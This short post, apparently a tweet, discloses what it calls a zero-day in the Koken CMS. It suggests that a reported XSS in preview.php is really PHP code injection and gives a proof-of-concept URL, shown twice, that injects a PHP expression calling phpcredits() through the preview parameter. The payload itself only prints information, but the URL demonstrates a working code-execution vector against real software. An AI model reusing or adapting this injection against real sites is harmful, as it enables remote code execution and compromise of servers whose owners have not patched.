Sometimes you can be a smart dude and report XSS. But maybe you were too hasty? Think about it.
http://koken.cms/preview.php?/albums/&preview=elementary/a:<?=phpcredits();?>
#0day
http://koken.cms/preview.php?/albums/&preview=elementary/a:<?=phpcredits();?>
#0day